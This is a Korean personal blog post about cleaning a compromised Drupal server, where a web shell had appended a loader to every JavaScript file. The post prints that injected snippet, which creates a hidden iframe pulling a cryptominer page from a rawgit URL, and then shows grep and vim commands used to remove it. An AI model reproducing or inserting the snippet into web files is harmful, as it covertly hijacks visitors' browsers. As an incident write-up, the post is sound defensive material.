티스토리 뷰

사실 얼마전 리눅스박스 cpu가 100프로를 처먹고 있길래 봤더니 이상한 웹쉘같은것들이 돌고 있더라..

그래서 htop로 보고 프로세스 트리 찾아서 kill함.. 드루팔 깔아놓고 방치상태였는데, 그쪽 취약점 물고 들어온듯..


그리고 몇달 신경안쓰고 있었는데.. ssl 업데이트 하고 보니까 크롬 developer mode에서 에러가 뜨더라고..

보니깐 이상한 주소를 자꾸 iframe으로 읽는거야..

구글링 하니까 바로는 안 나오고.. 좀 뒤져보니까 이런게 뜨더라고..

https://securityboulevard.com/2018/07/rawgit-cdn-is-abused-by-cryptoloot-cryptominers/


웹쉘이 접근 가능한 수준인지, 사용자 www-data가 접근할 수 있는 모든 js파일에 뭔가가 붙어있더라고..

void 0===window.mondrawtexture&&(window.mondrawtexture=1,window.onload=function(){var e=document.createElement('iframe');e.style.display='none',e.src='https://cdn.rawgit.com/jdobt/3e35d8a7d2c1c36ae1972ea03df91572/raw/8656e6f8554bfd2f13cf8eb78e8df044fae1e9e2/drawtexture.html',document.body.appendChild(e)}); 

요런 것들이 뒤에 붙어가지고.. 아참 이거 괜히 시험해본다고 js로 실행같은건 하지마.. 귀찮은 일 발생함..

* 지금은 github 사용자가 신고먹고 블락먹어서 괜찮긴 한거 같음.. 나쁜새끼..


일단 몇만개씩 되는거였으면 내가 뭐 파이썬같은거 했을거 같은데..

몇백개 정도는 스크립트 정도만 돌려도 되겠드라고..

일단은 grep으로 찾아봤음..

grep 'drawtexture.html' * -r


나처럼 감염된적 있으면 막 쭈루룩 나옴..

열몇개 정도는 수동으로 지웠는데.. 애매하게 몇백개 남은거 어찌할까 생각하다가..

터미널 프로그램 좀 괜찮은거 쓰면 매크로 기능이 있으니 그걸 활용하기로 함..

일단 vim으로 js파일 싹다 불러서 조치를 취해야겠..

find -name '*.js' -exec sudo vim {} \;


수동으로 지우면서 보니까 js파일에 싹다 맨밑 9줄이 더 붙어있더라고..

그래서 매크로에다가 G8dk:wq 를 등록하고..

걍 좀 지우다 보니까 금방이긴 하네..


C나 Python으로 제거프로그램 만들까 잠깐 생각해봤었는데.. 그건 좀 오바같아서..

이정도로 일단 마무리함..